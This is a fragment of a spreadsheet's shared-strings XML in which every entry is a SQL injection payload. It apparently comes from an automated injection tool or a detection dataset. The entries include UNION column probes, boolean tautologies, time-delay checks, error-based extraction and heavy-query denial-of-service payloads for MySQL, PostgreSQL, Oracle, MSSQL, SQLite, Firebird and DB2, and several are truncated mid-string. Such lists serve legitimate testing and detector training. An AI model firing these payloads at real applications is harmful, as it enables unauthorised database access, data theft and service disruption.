    <t>1'+ ( select 'rejz' where 1530 = 1530 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>-2751 where 6334 = 6334 or  ( 9668 = 5845 ) *5845--</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select  ( case when  ( 4076 = 4881 )  then 1 else 0x28 end  )  )   and   (  (   ( 'grzs' = 'grzs</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-2604  )  )   as sekb where 6897 = 6897 or 1000 = 7683</t>
  </si>
  <si>
    <t>-6947'  )  )   as qqjp where 6700 = 6700 union all select 6700#</t>
  </si>
  <si>
    <t>-6368  )  )   union all select 4646,4646,4646,4646,4646,4646,4646--</t>
  </si>
  <si>
    <t>-2987" )  as iyob where 7827 = 7827 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>1 )  as kjsd where 1670 = 1670 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  # qmkh</t>
  </si>
  <si>
    <t>1 where 2146 = 2146 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-6086'  )  )   or  ( 6719 = 7280 ) *7280 and   (  (  'ozbj' = 'ozbj</t>
  </si>
  <si>
    <t>1"  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "tfso" = "tfso</t>
  </si>
  <si>
    <t>1" where 2235 = 2235 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'|| ( select 'akye' where 9242 = 9242 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  where 3375 = 3375 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1  )  )   as henn where 9980 = 9980 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1 )  as cfnz where 6065 = 6065 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( 'knbx' like 'knbx</t>
  </si>
  <si>
    <t>1 )  where 1929 = 1929 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>1" )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1 where 4003 = 4003 union all select null--</t>
  </si>
  <si>
    <t>-4346' )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1' where 6409 = 6409</t>
  </si>
  <si>
    <t>1 )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1 )  where 6150 = 6150</t>
  </si>
  <si>
    <t>1" )  as ikdo where 4128 = 4128</t>
  </si>
  <si>
    <t>-6178  )  )   as lygb where 9559 = 9559 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>-6145 or  ( 8459 = 8459 ) *4906-- yklv</t>
  </si>
  <si>
    <t>1%' or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select 'swxi' where 7651 = 7651 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  +'</t>
  </si>
  <si>
    <t>1%" union all select null,null--</t>
  </si>
  <si>
    <t>-4983%" )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122</t>
  </si>
  <si>
    <t>1%' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'phdn' like 'phdn</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  </t>
  </si>
  <si>
    <t>1  )  )   as beld where 1679 = 1679 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-8615  )  )   )  or 4039 = 9144</t>
  </si>
  <si>
    <t>1 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-1332 )  as qtbb where 7261 = 7261 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 1718 = 5436,1,1/0 ) </t>
  </si>
  <si>
    <t>-1585%"  )  )   union all select 8818,8818,8818,8818,8818,8818#</t>
  </si>
  <si>
    <t>1' )  and elt ( 4249 = 4249,7259 )  and  ( 'bxnn' = 'bxnn</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</si>
  <si>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</si>
  <si>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and  ( 5116 = 1602 ) *1602</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   as fpej where 6790 = 6790 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 1570 = 6977 )  then 1 else 1570* ( select 1570 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>1' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( 'ejnt' like 'ejnt</t>
  </si>
  <si>
    <t>1'  )  )   )  or sleep ( 5 )  and   (  (   ( 'bmnf' like 'bmnf</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'jxqf' like 'jxqf</t>
  </si>
  <si>
    <t>1' )  as sruz where 6318 = 6318</t>
  </si>
  <si>
    <t>-8301' )  union all select 1806,1806--</t>
  </si>
  <si>
    <t>1  )  )   as vmwj where 5597 = 5597</t>
  </si>
  <si>
    <t>-9711'+ ( select 'ckpj' where 8338 = 8338 union all select 8338--</t>
  </si>
  <si>
    <t>1'|| ( select 'ubza' where 2576 = 2576</t>
  </si>
  <si>
    <t>-1920'  )  )   )  union all select 1424,1424,1424,1424,1424,1424,1424,1424,1424,1424#</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( "tpxo" like "tpxo</t>
  </si>
  <si>
    <t>1' )  as wvvo where 4288 = 4288</t>
  </si>
  <si>
    <t>-9737"  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>-4408" )  or 6872 = 6872 and  ( "oenu" = "oenu</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and 'hmqd' = 'hmqd</t>
  </si>
  <si>
    <t>-1908"  )  )   union all select 4072,4072,4072,4072,4072,4072,4072,4072,4072,4072#</t>
  </si>
  <si>
    <t>-1134" union all select 4865,4865,4865,4865,4865#</t>
  </si>
  <si>
    <t>select sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  where 5615 = 5615 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>-3282' )  union all select 9002,9002,9002,9002,9002#</t>
  </si>
  <si>
    <t>-5832" )  or 1650 = 9011--</t>
  </si>
  <si>
    <t>-8178 )  union all select 4163,4163,4163,4163,4163,4163,4163--</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( 'qrtf' = 'qrtf</t>
  </si>
  <si>
    <t>1" )  as ucex where 5148 = 5148 order by 1#</t>
  </si>
  <si>
    <t>1" and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' where 4102 = 4102 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>-5672'  )  )   union all select 9371,9371,9371,9371,9371,9371--</t>
  </si>
  <si>
    <t>1'|| ( select 'asfl' from dual where 5846 = 5846 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" )  where 6903 = 6903</t>
  </si>
  <si>
    <t>-2168"  )  )   union all select 4935,4935,4935,4935,4935,4935,4935,4935,4935--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) #</t>
  </si>
  <si>
    <t>-8005" )  union all select 5213,5213,5213,5213,5213--</t>
  </si>
  <si>
    <t>-7273%'  )  )   order by 1#</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'vhvh' = 'vhvh</t>
  </si>
  <si>
    <t xml:space="preserve">-9847%'  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t xml:space="preserve">1 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>1 )  as iiku where 9466 = 9466</t>
  </si>
  <si>
    <t>-6764' )  or 2314 = 2017--</t>
  </si>
  <si>
    <t xml:space="preserve">1" and elt ( 4594 = 1040,1040 ) </t>
  </si>
  <si>
    <t>1' )  where 2511 = 2511 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>-7107"  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>1 )  as afmb where 8665 = 8665 order by 1#</t>
  </si>
  <si>
    <t>1' )  as jwch where 4609 = 4609</t>
  </si>
  <si>
    <t>1'  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 'fvbv' = 'fvbv</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1' and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'ukxj' = 'ukxj</t>
  </si>
  <si>
    <t>1" where 3318 = 3318</t>
  </si>
  <si>
    <t>1'+ ( select 'ozpm' where 6939 = 6939 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   ) +'</t>
  </si>
  <si>
    <t>-6436' in boolean mode )  union all select 7589,7589,7589,7589--</t>
  </si>
  <si>
    <t>1 )  as mwcs where 2544 = 2544 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>-1630' union all select 1971,1971--</t>
  </si>
  <si>
    <t>1' rlike  ( select  ( case when  ( 1916 = 7874 )  then 1 else 0x28 end  )  )   and 'ughq' = 'ughq</t>
  </si>
  <si>
    <t>-7676"  )  )   as flov where 7967 = 7967 union all select 7967--</t>
  </si>
  <si>
    <t>-3377" )  or 4982 = 6608#</t>
  </si>
  <si>
    <t>-1059" )  union all select 1276,1276,1276,1276,1276,1276,1276,1276#</t>
  </si>
  <si>
    <t>1  )  )   as dhqt where 8485 = 8485 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1" and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "endx" = "endx</t>
  </si>
  <si>
    <t>-5526 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">-5769 )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 1014 = 4280 )  then 1014 else 1014* ( select 1014 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1" )  as iwri where 4921 = 4921 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-5738" )  as efbn where 8541 = 8541 union all select 8541,8541,8541,8541,8541,8541,8541,8541#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( extractvalue ( 1759,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1759 = 1759,1  )  )   ) ,0x717a767a71  )  )   ) </t>
  </si>
  <si>
    <t>1'  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  'qtul' like 'qtul</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  #</t>
  </si>
  <si>
    <t>-4171' )  union all select 6136#</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( 'xzbk' = 'xzbk</t>
  </si>
  <si>
    <t>1  )  )   as iihk where 5414 = 5414 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and 'qjle' = 'qjle</t>
  </si>
  <si>
    <t>1'  )  )   and 9198 = 9198--</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) # dbzk</t>
  </si>
  <si>
    <t>1'  )  )   )  and sleep ( 5 )  and   (  (   ( 'lbmp' = 'lbmp</t>
  </si>
  <si>
    <t>1" where 9342 = 9342 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>-5275%'  )  )   union all select 9382,9382,9382,9382,9382,9382,9382,9382,9382,9382--</t>
  </si>
  <si>
    <t>1'|| ( select 'zoqo' from dual where 2063 = 2063</t>
  </si>
  <si>
    <t>-2992%'  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 12</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>select  ( case when  ( 5085 = 4259 )  then 5085 else 5085* ( select 5085 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and 'cotv' like 'cotv</t>
  </si>
  <si>
    <t xml:space="preserve">-6970"  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char </t>
  </si>
  <si>
    <t>1" )  as bllz where 6975 = 6975 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-8106%" )  union all select 2051,2051,2051,2051,2051,2051#</t>
  </si>
  <si>
    <t>-2296" union all select 7359,7359,7359,7359,7359,7359#</t>
  </si>
  <si>
    <t>1 or sleep ( 5 ) -- nrzf</t>
  </si>
  <si>
    <t>1" )  as cnrh where 8524 = 8524 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1" )  as uorp where 7208 = 7208</t>
  </si>
  <si>
    <t>1"  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "kldp" like "kldp</t>
  </si>
  <si>
    <t>1  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( 3036 = 3036</t>
  </si>
  <si>
    <t>1" )  where 4172 = 4172 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'csmu' = 'csmu</t>
  </si>
  <si>
    <t>1'|| ( select 'fraa' from dual where 9140 = 9140 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x  )  )  ||'</t>
  </si>
  <si>
    <t>1" )  as mwja where 7881 = 7881 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>1' where 6533 = 6533</t>
  </si>
  <si>
    <t>1'+ ( select qymy where 8657 = 8657 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 where 5359 = 5359 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>1' )  as wtev where 5283 = 5283</t>
  </si>
  <si>
    <t>1  )  )   as jvoo where 5116 = 5116 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-7552 or 6872 = 6872</t>
  </si>
  <si>
    <t>1" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and "cecf" = "cecf</t>
  </si>
  <si>
    <t>1" and elt ( 1210 = 1210,sleep ( 5  )  )   and "phcl" like "phcl</t>
  </si>
  <si>
    <t>1'+ ( select tvpj where 7058 = 7058 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  </t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 9348 = 9348</t>
  </si>
  <si>
    <t>-2920'  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char (</t>
  </si>
  <si>
    <t>1%" or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as xkiq where 9008 = 9008 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-1687  )  )   as lnva where 8396 = 8396 union all select 8396,8396#</t>
  </si>
  <si>
    <t>-8819" )  where 9119 = 9119 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char (</t>
  </si>
  <si>
    <t>1 and 9122 = 4153# nxcv</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 'nslo' like 'nslo</t>
  </si>
  <si>
    <t>1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and 'esjl' = 'esjl</t>
  </si>
  <si>
    <t>1 )  where 8616 = 8616 and 2006 = 2006</t>
  </si>
  <si>
    <t>-1802%'  )  )   union all select 1002,1002,1002,1002,1002,1002,1002#</t>
  </si>
  <si>
    <t>1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and 'vnkr' like 'vnkr</t>
  </si>
  <si>
    <t>1" where 3018 = 3018 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'yhpe' where 8010 = 8010 rlike  ( select  ( case when  ( 7910 = 3752 )  then 1 else 0x28 end  )  )   ) ||'</t>
  </si>
  <si>
    <t>1 where 8966 = 8966</t>
  </si>
  <si>
    <t>-9718%" )  union all select 9515,9515,9515#</t>
  </si>
  <si>
    <t>1  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  3102 = 3102</t>
  </si>
  <si>
    <t>1" where 7696 = 7696 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>1  )  )   and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "kndm" = "kndm</t>
  </si>
  <si>
    <t>1'+ ( select 'mzee' where 5984 = 5984</t>
  </si>
  <si>
    <t>-7435' )  where 6242 = 6242 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) |</t>
  </si>
  <si>
    <t>1"  )  )   as hbfi where 4773 = 4773 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1  )  )   or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  8048 = 8048</t>
  </si>
  <si>
    <t>1'|| ( select 'idna' from dual where 2683 = 2683 rlike  ( select  ( case when  ( 3201 = 9748 )  then 1 else 0x28 end  )  )   ) ||'</t>
  </si>
  <si>
    <t>1' )  as ghvi where 3880 = 3880 and 4595 = 4595#</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-7043" )  where 9755 = 9755 union all select 9755,9755,9755,9755,9755,9755#</t>
  </si>
  <si>
    <t>-1004" where 6266 = 6266 order by 1#</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( case when 3598 = 2118 then 1 else null end ) </t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
